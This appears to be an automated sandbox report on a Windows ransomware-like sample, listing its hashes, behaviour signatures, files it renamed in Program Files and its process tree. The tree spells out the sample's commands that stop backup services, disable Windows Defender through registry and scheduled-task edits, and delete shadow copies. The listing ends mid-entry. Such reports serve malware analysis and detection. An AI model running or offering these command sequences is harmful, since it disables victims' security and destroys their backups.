Analysis
- max time kernel: 134s
- max time network: 135s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 12-01-2022 14:50
Static task: static1
Behavioral task: behavioral1
  Sample: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
  Resource: win10-en-20211208
General
- Target: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
- Size: 3.5MB
- MD5: 851a6706bd679387f197f552dae896bc
- SHA1: ee7d2cf647ee85becd133146b4f600f2fa6965e8
- SHA256: a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b
- SHA512: ba586db7ec4cc3bf89f2e2ad037f1a36e139f55e125087a3840331bb7d47105cffb2d4e46b154fde07007f0e7b8be202fa76f0eca7636409f3c47484bd081a1e
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
  MpCmdRun.exe (PID 1968)
-
Modifies security service 2 TTPs 1 IoCs
Processes:
  reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
  a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe: File opened for modification (64 IoCs, all by the sample process)
    C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookWideTile.scale-200.png
    C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xecd0.png
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\plugin.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__KAAAACgAAAA0.vl6ia
    C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\de-DE\mshwLatin.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rectangle_icon.png
    C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-64.png
    C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_32x32x32.png
    C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\SplashScreen.scale-100.png
    C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64.png
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__FAAAABQAAAA0.vl6ia
    C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\Java\jre1.8.0_66\lib\jce.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__MgAAADIAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookWideTile.scale-150.png
    C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-ppd.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__PAAAADwAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPageState2\spider_bp_920.jpg
    C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\11d.png
    C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__KAAAACgAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Eye.png
    C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x
    C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-100.png
    C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]_H6p_VnJ5P__DAAAAAwAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml
    C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\AppxSignature.p7x
    C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__LAAAACwAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\188.png
    C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\orcl7.xsl.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Deal\New-Deal-up.png
    C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\5601_24x24x32.png
    C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailWideTile.scale-200.png
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\rofl.png
    C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml
    C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1849_24x24x32.png
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Grace-ppd.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\ProjectionCylindric.scale-180.png
    C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\91.jpg
    C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Xaml.Toolkit\Assets\CardsLoadingSpritesheet.png
    C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\SmallTile.scale-125.png
    C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Outlook.scale-150.png
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\ui-strings.js.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__JAAAACQAAAA0.vl6ia
    C:\Program Files\Microsoft Office\root\Office16\1033\TellMePowerPoint.nrr.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xsl.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__CAAAAAgAAAA0.vl6ia
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msaddsr.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\CherryBlossoms.jpg
    C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\en-us\styles\wefgallerywinrt.css
    C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockMedTile.scale-125.png
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ru_135x40.svg.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\rtscom.dll.mui.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__FgAAABYAAAA0.vl6ia
    C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ppd.xrm-ms.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6416_40x40x32.png
    C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
    C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL001.XML.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__GAAAABgAAAA0.vl6ia
    C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__OgAAADoAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Classic\classic_10h.png
    C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL093.XML.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__CAAAAAgAAAA0.vl6ia
    C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Icon.targetsize-48.png
    C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-TW.respack
    C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-100.png
    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close.svg.dfp-1MIfcdzpX90xYKH8dYaSWWIJ40RQ_H6p_VnJ5P__AAAAAAAAAAA0.vl6ia
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  vssadmin.exe (PID 2352)
-
Modifies registry class 3 IoCs
Processes:
  reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
  reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
  reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
  powershell.exe (PID 2404): 3 events
  powershell.exe (PID 1204): 3 events
  a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe (PID 860): 2 events
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (privilege tokens adjusted, in the order recorded; the listing is capped at 64 IoCs):
  wevtutil.exe (PID 3412): SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe (PID 2104): SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe (PID 1156): SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe (PID 2160): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe (PID 2748): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe (PID 2748), second pass: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source PID and process, target PID and process, number of recorded events; the listing is capped at 64 IoCs):
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 1416 (net.exe): 3 events
  PID 1416 (net.exe) wrote to memory of PID 2904 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 1836 (net.exe): 3 events
  PID 1836 (net.exe) wrote to memory of PID 784 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 2832 (net.exe): 3 events
  PID 2832 (net.exe) wrote to memory of PID 2264 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 3392 (net.exe): 3 events
  PID 3392 (net.exe) wrote to memory of PID 1360 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 2392 (net.exe): 3 events
  PID 2392 (net.exe) wrote to memory of PID 1348 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 836 (net.exe): 3 events
  PID 836 (net.exe) wrote to memory of PID 1848 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 2344 (net.exe): 3 events
  PID 2344 (net.exe) wrote to memory of PID 1204 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 4088 (net.exe): 3 events
  PID 4088 (net.exe) wrote to memory of PID 1548 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 1608 (net.exe): 3 events
  PID 1608 (net.exe) wrote to memory of PID 1800 (net1.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 1716 (sc.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 1980 (sc.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 2148 (sc.exe): 3 events
  PID 860 (a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe) wrote to memory of PID 2580 (sc.exe): 1 event
Processes
-
C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2904
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:784
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2264
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1360
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1348
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1848
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1204
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1548
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_1509d" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1509d" /y3⤵PID:1800
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1716
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1980
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2148
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2580
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3268
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:3968
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1668
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3432
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_1509d" start= disabled2⤵PID:3688
-
C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  PID:3228

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  PID:3860

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  PID:2040

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  PID:3920

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  PID:1216

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  PID:3224

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  PID:2116

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  PID:2260

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  PID:2600

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  PID:60

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  PID:3056

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  PID:684

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  PID:544

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  PID:2276

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  PID:1468

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  PID:1736

C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  PID:1564

C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  PID:2200

C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  PID:2188

C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  PID:2744

C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  PID:2984

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  PID:724

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  PID:2964

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  PID:3728

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - Modifies registry class
  PID:3500

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - Modifies registry class
  PID:1844

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - Modifies registry class
  PID:1228

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  PID:3776

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  PID:1596

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  PID:2120

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  PID:1360

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  - Modifies security service
  PID:1224

C:\Windows\SysWOW64\reg.exe (level 2)
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  PID:396

C:\Windows\SysWOW64\vssadmin.exe (level 2)
  vssadmin.exe delete shadows /all /quiet
  - Interacts with shadow copies
  PID:2352

C:\Windows\SysWOW64\wevtutil.exe (level 2)
